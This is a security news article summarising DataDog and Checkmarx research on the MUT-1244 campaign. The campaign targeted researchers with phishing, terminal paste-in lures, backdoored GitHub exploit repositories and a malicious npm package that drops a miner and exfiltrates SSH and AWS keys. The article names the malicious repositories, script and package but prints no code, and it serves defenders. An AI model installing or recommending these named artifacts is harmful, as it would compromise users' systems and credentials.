MUT-1244 targeting security researchers, red teamers, and threat actors
A threat actor tracked as MUT-1244 by DataDog researchers has been targeting academics, pentesters, red teamers, security researchers, as well as other threat actors, in order to steal AWS access keys, WordPress account credentials and other sensitive data.
MUT-1244 has been using phishing emails, the ClickFix tactic, and GitHub repositories with bogus proof-of-concept (PoC) exploits or copies of legitimate, working exploits that have been backdoored or include a malicious npm package.
But, they’ve also been somewhat careless, allowing DataDog and Checkmarx researchers to make connections and trace their activities.
A broad and long-running campaign
MUT-1244’s ultimate goal is to deliver xmrdropper – a payload that updates a cryptocurrency miner but also backdoors systems and “exfiltrates system information, private SSH keys, environment variables, and the content of select folders (such as ~/.aws) to the file sharing service file[.]io.”
To do that, they’ve scraped email addresses from research papers published on the arXiv open-access archive and – from October 5 to October 21, 2024 – sent out a phishing email nudging academics and researchers to install a CPU microcode update by copying and pasting a piece of code into their system’s terminal.
The phishing webpage instructing victims to install the CPU update (Source: DataDog)
“To our knowledge, this is the first documented ‘ClickFix’-type attack that targets Linux systems. When the victim executes the malicious command, the script patch-mc-0x129.sh from the GitHub repository opencompiled-oss/kernel-patch is executed,” DataDog researchers Christophe Tafani-Dereeper, Adrian Korn and Matt Muir explained.
The script drops the xmrdropper, from https://codeberg[.]org/k0rn66/xmrdropper.
Simultaneously, they’ve also been targeting security researchers and offensive actors by setting up dozens of malicious GitHub repositories with fake and/or trojanized PoC exploit code which resulted in the download and execution of the xmrdropper.
Finally, they’ve also set up a trojanized GitHub project (hpc20235/yawpp) that offered a tool for checking the validity of WordPress credentials, but required users to also install the @0xengine/xmlrpc npm package as a dependency. The package would drop the xmrdropper, as well as exfiltrate sensitive files to Dropbox.
Multi-pronged attack campaign (Source: DataDog)
According to Checkmarx researchers, the combination of regular updates, seemingly legitimate functionality, and strategic dependency placement has contributed to the @0xengine/xmlrpc package being hosted on the NPM registry (and not flagged as malicious!) since October 2023.
“The malware steals sensitive data (SSH keys, bash history, etc..) every 12 hours while mining cryptocurrency on infected systems,” they shared in late November 2024. “At the time of investigation, it appeared that up to 68 compromised systems were actively mining cryptocurrency through the attacker’s Monero wallet.”
“Hundreds of victims of MUT-1244 were and are still being compromised,” DataDog researchers warned on Friday.
Both companies have shared indicators of compromise to help potential victims check whether they’ve been compromised.